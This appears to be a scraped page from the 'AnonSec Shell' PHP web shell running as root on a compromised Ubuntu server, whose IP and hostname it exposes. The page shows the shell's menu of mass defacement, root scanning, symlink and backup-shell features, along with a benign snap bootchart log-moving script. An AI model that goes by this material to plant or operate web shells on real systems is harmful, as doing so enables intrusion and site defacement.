AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /snap/core20/2599/lib/systemd/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /snap/core20/2599/lib/systemd/systemd-bootchart-poststop.sh
#!/bin/sh

set -eu

modeenv=/run/mnt/data/system-data/var/lib/snapd/modeenv
mode="$(/usr/libexec/core/get-mode mode "${modeenv}")" || mode="unknown"

case "${mode}" in
    install|recover|factory-reset)
        save_dir=/run/mnt/ubuntu-data/system-data/var/log/debug
        ;;
    *)
        save_dir=/run/mnt/data/system-data/var/log/debug
        ;;
esac

next_num=1
for boot in "${save_dir}"/boot*; do
    if [ -d "${boot}" ]; then
        base="$(basename "${boot}")"
        num="${base#boot}"
        if [ "${num}" -ge "${next_num}" ]; then
            next_num="$((${num}+1))"
        fi
    fi
done
next_dir="${save_dir}/boot${next_num}"
mkdir -p "${next_dir}"
mv /run/log/base/*.svg "${next_dir}/"

for initrd_file in /run/log/*.svg; do
    if [ -f "${initrd_file}" ]; then
        base="$(basename "${initrd_file}")"
        mv "${initrd_file}" "${next_dir}/initrd-${base}"
    fi
done

Anon7 - 2022
AnonSec Team